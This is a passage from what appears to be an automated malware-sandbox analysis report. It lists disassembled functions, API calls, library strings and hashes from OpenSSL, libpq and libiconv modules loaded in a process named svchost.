                                                                                              • Part of subcall function 00007FFDA3633520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA3633605
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA36334E4
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA36334FA
                                                                                              • Part of subcall function 00007FFDA3677C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFDA3662254), ref: 00007FFDA3677C3F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$D_get0_nameF_freeR_set_errorR_vset_errorX_free
                                                                                            • String ID: ssl\tls13_enc.c$tls13_hkdf_expand
                                                                                            • API String ID: 3505470307-2272528545
                                                                                            • Opcode ID: fddb73f3f42d1e361181b1abec8d52160b2be2fd5d63a0ca5188853081ea47d7
                                                                                            • Instruction ID: 737b97a63b15de7a64db44deb057e0f2fa3ed5ee9e29ff602ca03426cce5377d
                                                                                            • Opcode Fuzzy Hash: fddb73f3f42d1e361181b1abec8d52160b2be2fd5d63a0ca5188853081ea47d7
                                                                                            • Instruction Fuzzy Hash: AF114232B09BC586E760DB29F49079AB3A5FB88784F145035EA8C93B5ADF3DC545CB04
                                                                                            Function 00007FFDA36EAD9F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36EAEFA
                                                                                              • Part of subcall function 00007FFDA36EB5A0: isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB5F6
                                                                                              • Part of subcall function 00007FFDA36EB5A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB612
                                                                                              • Part of subcall function 00007FFDA36EB5A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB669
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fwrite$fputcisprint
                                                                                            • String ID: %d$FunctionCallResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1029667085-1867656554
                                                                                            • Opcode ID: efdbf0a0ab0c98554b995f3597e2318e88cfe4c2bb1ecae12fbd1ed1b6ad4410
                                                                                            • Instruction ID: e19022aa4e6c62186b452ac5dc33cdc5eb13aa977bda9ed9e99d04a26261ff21
                                                                                            • Opcode Fuzzy Hash: efdbf0a0ab0c98554b995f3597e2318e88cfe4c2bb1ecae12fbd1ed1b6ad4410
                                                                                            • Instruction Fuzzy Hash: 55110672B1A24682F600CB15E0616B96352EB807D8F486032EE0E13797CE3EE18AC708
                                                                                            Function 00007FFDA36E2D70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2E10: GetLastError.KERNEL32(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E24
                                                                                              • Part of subcall function 00007FFDA36E2E10: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E4A
                                                                                            • libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastgetenvlibintl_dgettext
                                                                                            • String ID: libpq-16
                                                                                            • API String ID: 948195521-2857872724
                                                                                            • Opcode ID: 3a66661c28db6f6a59ade8c62b7045bd0313baf9ad75bd288b81f85660766bec
                                                                                            • Instruction ID: 1bc368db807a32a3058b97fa8ac9766c9536f17772078bda3230c67cb325c7bb
                                                                                            • Opcode Fuzzy Hash: 3a66661c28db6f6a59ade8c62b7045bd0313baf9ad75bd288b81f85660766bec
                                                                                            • Instruction Fuzzy Hash: E901A17270AB4286FA00AF10B4102A97362EB44BC4F2C6030EF4D27756CF3DD459C748
                                                                                            Function 00007FFDA36E2CD0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2E10: GetLastError.KERNEL32(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E24
                                                                                              • Part of subcall function 00007FFDA36E2E10: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E4A
                                                                                            • libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastgetenvlibintl_dgettext
                                                                                            • String ID: libpq-16
                                                                                            • API String ID: 948195521-2857872724
                                                                                            • Opcode ID: a9c82ebae72f40f34554ead507a958cf501be2d46aebe87ea8db7c5dc2d6914a
                                                                                            • Instruction ID: 046e0f14d7b17456bc3985a31750a9bdf5ddb6f7382dde6fc793bd07a8cd677e
                                                                                            • Opcode Fuzzy Hash: a9c82ebae72f40f34554ead507a958cf501be2d46aebe87ea8db7c5dc2d6914a
                                                                                            • Instruction Fuzzy Hash: 62018232719B4186E610AF00F4501A9B762FB85BC0F2C5030EF8923756CF3ED455C744
                                                                                            Function 66016570 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32 ref: 660165A0
                                                                                            • _strdup.MSVCRT(?,?,?,6600130D), ref: 660165CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleName_strdup
                                                                                            • String ID: c:\windows\system32\libiconv-2.dll
                                                                                            • API String ID: 831641638-1504765582
                                                                                            • Opcode ID: 7026bf7928d83cec5f1dfbb0561090c78347d4f3e1acf3064690492de37efd13
                                                                                            • Instruction ID: 9c0fe357a8a4ab016a03859fd8cde1af2f625d726f15842b17dfc37c7e64cff7
                                                                                            • Opcode Fuzzy Hash: 7026bf7928d83cec5f1dfbb0561090c78347d4f3e1acf3064690492de37efd13
                                                                                            • Instruction Fuzzy Hash: 8201D130A6C61582FB1187E2BC403167AAA7785344F811875C818C6AA5EA3FCBA0C344
                                                                                            Function 00007FFDA36EAC0E Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: %d$Authentication$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3645302600
                                                                                            • Opcode ID: 65b55df67341c2a45037abb1bca6d99a94d1ae5a68168e52fdb9a211edd1527c
                                                                                            • Instruction ID: 37ffcdde2a4d5e09f43830c8be1d682c3464bfea1ff73a40f1eb0fe501650835
                                                                                            • Opcode Fuzzy Hash: 65b55df67341c2a45037abb1bca6d99a94d1ae5a68168e52fdb9a211edd1527c
                                                                                            • Instruction Fuzzy Hash: E1018F6271B68686FA50D715E161BB92322EB447D8F482032DE0E17747CE7EE58AC748
                                                                                            Function 00007FFDA36E8368 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36E8C80: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36E9D72), ref: 00007FFDA36E8C91
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E8393
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E83CC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastfreelibintl_dgettextmalloc
                                                                                            • String ID: SSL error: %s$out of memory allocating error description
                                                                                            • API String ID: 1502961081-4093627138
                                                                                            • Opcode ID: e3d34bd05711348f7b805d04645ebf8f4f40213b9870b51db00fec4438ff1202
                                                                                            • Instruction ID: 83ee0ce886f3beae854633903e92dd346b22a1f0fc75e19d1f881b36620e1229
                                                                                            • Opcode Fuzzy Hash: e3d34bd05711348f7b805d04645ebf8f4f40213b9870b51db00fec4438ff1202
                                                                                            • Instruction Fuzzy Hash: ABF05452B0BA0241FD11A765B4352B952432F45BB1F5C1335DD3D1A3D7DE3DE4858358
                                                                                            Function 00007FFDA36E8565 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36E8C80: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36E9D72), ref: 00007FFDA36E8C91
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E8590
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E85C9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastfreelibintl_dgettextmalloc
                                                                                            • String ID: SSL error: %s$out of memory allocating error description
                                                                                            • API String ID: 1502961081-4093627138
                                                                                            • Opcode ID: 7d64dc923ddbdbb8918f8f8ded1c80ffeac5535c1bbff89e7c97c654edb7c8c5
                                                                                            • Instruction ID: b3056907bf4b0cf94d4c441970b0528829fae09b2788a69b5a005803e6c00f9c
                                                                                            • Opcode Fuzzy Hash: 7d64dc923ddbdbb8918f8f8ded1c80ffeac5535c1bbff89e7c97c654edb7c8c5
                                                                                            • Instruction Fuzzy Hash: B6F05E21B0BA4241FD11AB65E4752F962526F49FB0F9C2334DA2E2B3D3DE2DE4458358
                                                                                            Function 00007FFDA36DF580 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: b8b85842ba8dcd65b29ae0c9a608aaecfd78d6fd32637d9c73b25371dd4363bf
                                                                                            • Instruction ID: 059b60f5c306b3ec1a7697dc440631c93e9364c906ed9c67494933d25160bc29
                                                                                            • Opcode Fuzzy Hash: b8b85842ba8dcd65b29ae0c9a608aaecfd78d6fd32637d9c73b25371dd4363bf
                                                                                            • Instruction Fuzzy Hash: 72414D33707B8196EA108F21E86036963A5FB48F94F0C1936DE4D1B766DF39E4A4C714
                                                                                            Function 66017970 Relevance: 6.3, APIs: 4, Instructions: 316COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcmemset
                                                                                            • String ID:
                                                                                            • API String ID: 947785774-0
                                                                                            • Opcode ID: e3940594ec7f73555511dd730e57fd8a3650c189e3bd6568bd07ef9ec0775b84
                                                                                            • Instruction ID: ca34cb53b04c8fcfc0278a44d8fddbaa152276bbc658d6a83c09249c9bdcd32b
                                                                                            • Opcode Fuzzy Hash: e3940594ec7f73555511dd730e57fd8a3650c189e3bd6568bd07ef9ec0775b84
                                                                                            • Instruction Fuzzy Hash: 34B10463B1C28086D7118FA8C04035EBEE1B755BACF658639DE2A5B7C4D339E982C780
                                                                                            Function 00007FFDA36DD590 Relevance: 6.3, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD601
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD621
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD64A
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD660
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD689
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: a1e44e65adb7dfe5ead3a669016fd1134545db574b0835f00e4ed316f870b1b0
                                                                                            • Instruction ID: b5e065fb2f6ab5538217c261c166b49b99d4f778b4c5b2225681f29b27ae457a
                                                                                            • Opcode Fuzzy Hash: a1e44e65adb7dfe5ead3a669016fd1134545db574b0835f00e4ed316f870b1b0
                                                                                            • Instruction Fuzzy Hash: 11212636B0AB8186EB049F65E4A02A97365FB84F84F1C1135DE8E1B75ACF39D494C358
                                                                                            Function 66017E90 Relevance: 6.2, APIs: 4, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e824c019b938f3e368e1071fca967f6651d8a02c2b16b0ab1511b726712c7ea
                                                                                            • Instruction ID: d1fb34760a8471a1d68e74bdaac7c1ea815d8cc40a6a65b37cb5c69206f35d67
                                                                                            • Opcode Fuzzy Hash: 9e824c019b938f3e368e1071fca967f6651d8a02c2b16b0ab1511b726712c7ea
                                                                                            • Instruction Fuzzy Hash: 3281F173F196959AE752CFA9C00471ABFE1F745BA8F558234CE281B348D339EA41CB80
                                                                                            Function 66014AA0 Relevance: 6.2, APIs: 4, Instructions: 233COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d31fcd258d7eb59c28780b414e9cc7b30964fc1e18a315f7d7277b5be0e66e18
                                                                                            • Instruction ID: 4914472fc2d2e98edb09ebd0f309e5b260e1dffca19d2174e5c60ddcec9b2413
                                                                                            • Opcode Fuzzy Hash: d31fcd258d7eb59c28780b414e9cc7b30964fc1e18a315f7d7277b5be0e66e18
                                                                                            • Instruction Fuzzy Hash: 18615AE198E25466EB118BD990D07ADBF92A3077CDFC68532DF6807366D128CACAC345
                                                                                            Function 00007FFDA36E7170 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: %s$insufficient data in "T" message$out of memory for query result
                                                                                            • API String ID: 2221118986-1506934984
                                                                                            • Opcode ID: e38e3d093b8009d1594e09d26521006121828f110bd7ae55ef5d791641526b1a
                                                                                            • Instruction ID: f0be6b7445d6b7f9e8725cbcf2a19760432044216f4125d570b543fbb7e0cabc
                                                                                            • Opcode Fuzzy Hash: e38e3d093b8009d1594e09d26521006121828f110bd7ae55ef5d791641526b1a
                                                                                            • Instruction Fuzzy Hash: 66919172B0A68286FB60DF11E4602F977A2FB44B84F5C9031DE4DA7786EF39E5098704
                                                                                            Function 00007FFDA36F5490 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F5516
                                                                                            • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5539
                                                                                            • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5545
